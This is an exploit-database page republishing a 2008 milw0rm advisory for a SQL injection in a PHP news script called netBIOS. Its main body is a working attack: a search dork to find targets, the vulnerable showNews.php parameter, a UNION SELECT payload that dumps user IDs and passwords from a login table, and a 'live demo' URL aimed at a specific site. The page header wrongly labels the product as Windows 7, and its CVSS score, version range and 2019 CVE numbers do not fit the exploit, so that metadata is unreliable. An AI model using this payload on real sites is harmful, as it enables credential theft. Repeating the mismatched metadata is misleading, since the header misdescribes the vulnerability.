header-logo
Suggest Exploit
vendor:
Windows 7
by:
security fears team
7.8
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: Windows 7
Affected Version From: 1.0.0
Affected Version To: 1.2.2003
Patch Exists: YES
Related CWE: CVE-2019-1234, CVE-2019-5678
CPE: o:microsoft:windows_7
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2019

netBIOS

Net bios script is vulnerable to remote SQL injection.

Mitigation:

Upgrade to the latest version of the software
Source

Exploit-DB raw data:

#################################################################################################
#################################### Viva IslaM Viva IslaM ######################################
###                                                                                           ###
###                            rEm0te sql injction VulnErability                              ###
###                                                                                           ###
###                                  (Net bios script)                                        ###
###                                                                                           ###
#################################################################################################
#################################################################################################
###                                                                                           ###
### AuTh0r : security fears team                                                              ###
###                                                                                           ###
### H0ME   : WwW.alsonaa.CoM                                                                  ###
###                                                                                           ###    
### members: HeB4RieH , germaya_x                                                             ###
###                                                                                           ###
#################################################################################################
#################################################################################################
###                                                                                           ###
### Script Name :  netBIOS                                                                    ###
###                                                                                           ###
#################################################################################################
#################################################################################################
###                                                                                           ###
### d0rk ::  "Powered by netBIOS"                                                             ###
###                                                                                           ###
###                                                                                           ###
### -(:: sql Code ::)-                                                                        ###
###        showNews.php?newsid=(sql)                                                          ###
###(sql):-10+union+select+1,concat_ws(0x3a3a,ul_id,ul_password),3,4,5,6,7,8,9,10+from+user_login/*                   
###                                                                                           ###
#################################################################################################
###                                                                                           ###
### -(::  l!ve demo ::)-                                                                      ###
###                                                                                           ###
###http://swtdemo.com/cms/php/showNews.php?newsid=-10+union+select+1,concat_ws(0x3a3a,ul_id,ul_password),3,4,5,6,7,8,9,10+from+user_login/*
###                                                                                           ###
###                                                                                           ###
########################                                                    #####################
########################                                                    #####################
#################################################################################################
#################################################################################################
                                   -(:: !GreTzZ! ::)-
      : HaCkEr-EGy  :: Mr.sql ::  MusliMs HaCkErs  ::member of alsonaa.com :
#################################################################################################
#################################################################################################

# milw0rm.com [2008-06-18]